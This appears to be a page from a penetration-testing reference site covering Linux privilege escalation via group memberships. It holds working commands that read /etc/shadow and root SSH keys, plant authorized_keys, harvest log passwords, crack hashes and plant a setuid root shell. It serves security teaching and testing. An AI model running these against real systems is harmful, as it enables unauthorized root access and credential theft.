> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Groups-based Privesc

> Privilege escalation via Linux group memberships: disk, adm, video, staff, shadow, and more.

## Check Groups

```bash theme={"dark"}
id
groups
cat /etc/group | grep $(whoami)
```

***

## docker Group

Full root access via host filesystem mount.

```bash theme={"dark"}
docker run -v /:/mnt --rm -it alpine chroot /mnt bash
```

See dedicated [Docker / LXD Escape](/linux-privesc/docker-lxd) page.

***

## lxd Group

Import image, mount host filesystem, root.

See dedicated [Docker / LXD Escape](/linux-privesc/docker-lxd) page.

***

## disk Group

Direct read/write access to block devices. Bypass all filesystem permissions.

### Read /etc/shadow

```bash theme={"dark"}
df -h
# Find root partition, e.g., /dev/sda1

debugfs /dev/sda1
debugfs: cat /etc/shadow
```

### Read SSH Keys

```bash theme={"dark"}
debugfs /dev/sda1
debugfs: cat /root/.ssh/id_rsa
```

### Write Files

```bash theme={"dark"}
debugfs -w /dev/sda1
debugfs: write /tmp/authorized_keys /root/.ssh/authorized_keys
```

***

## adm Group

Read log files. Harvest credentials from logs.

```bash theme={"dark"}
find /var/log -readable 2>/dev/null
```

### Search Logs for Passwords

```bash theme={"dark"}
grep -ri "password\|pass\|pwd" /var/log/ 2>/dev/null
grep -ri "Failed password\|Accepted password" /var/log/auth.log 2>/dev/null
```

### Auth Log — Usernames as Passwords

Users sometimes type password in username field:

```bash theme={"dark"}
grep "Invalid user" /var/log/auth.log | awk '{print $8}' | sort -u
```

### Audit Logs

```bash theme={"dark"}
aureport --tty 2>/dev/null
cat /var/log/audit/audit.log | grep -i "passwd\|password" 2>/dev/null
```

***

## video Group

Access framebuffer — screenshot what's on screen.

```bash theme={"dark"}
cat /dev/fb0 > /tmp/screenshot.raw
```

Get resolution:

```bash theme={"dark"}
cat /sys/class/graphics/fb0/virtual_size
# e.g., 1920,1080
```

Convert on attacker:

```bash theme={"dark"}
ffmpeg -f rawvideo -pix_fmt bgra -s 1920x1080 -i screenshot.raw screenshot.png
```

Also access GPU devices:

```bash theme={"dark"}
ls -la /dev/dri/
```

***

## shadow Group

Direct read access to `/etc/shadow`.

```bash theme={"dark"}
cat /etc/shadow
```

Crack hashes:

```bash theme={"dark"}
hashcat -m 1800 shadow.hash /usr/share/wordlists/rockyou.txt
```

***

## staff Group

Write to `/usr/local/` without root. Hijack binaries.

```bash theme={"dark"}
ls -la /usr/local/bin/
```

If a root cron or service calls a binary from `/usr/local/bin/`:

```bash theme={"dark"}
echo '#!/bin/bash' > /usr/local/bin/target-binary
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /usr/local/bin/target-binary
chmod +x /usr/local/bin/target-binary
```

***

## sudo Group

User can run any command via sudo (needs password).

```bash theme={"dark"}
sudo su
sudo bash
```

If password unknown — check sudo token reuse or other techniques.

***

## root Group

Not same as root user, but may have read access to root-owned files:

```bash theme={"dark"}
find / -group root -writable 2>/dev/null | grep -v proc
```

***

## Quick Reference

| Group    | Impact | Technique               |
| -------- | ------ | ----------------------- |
| `docker` | Root   | Mount host filesystem   |
| `lxd`    | Root   | Privileged container    |
| `disk`   | Root   | debugfs on block device |
| `adm`    | Creds  | Read log files          |
| `video`  | Info   | Screenshot framebuffer  |
| `shadow` | Creds  | Read /etc/shadow        |
| `staff`  | Root   | Write to /usr/local/    |
| `sudo`   | Root   | sudo (needs password)   |
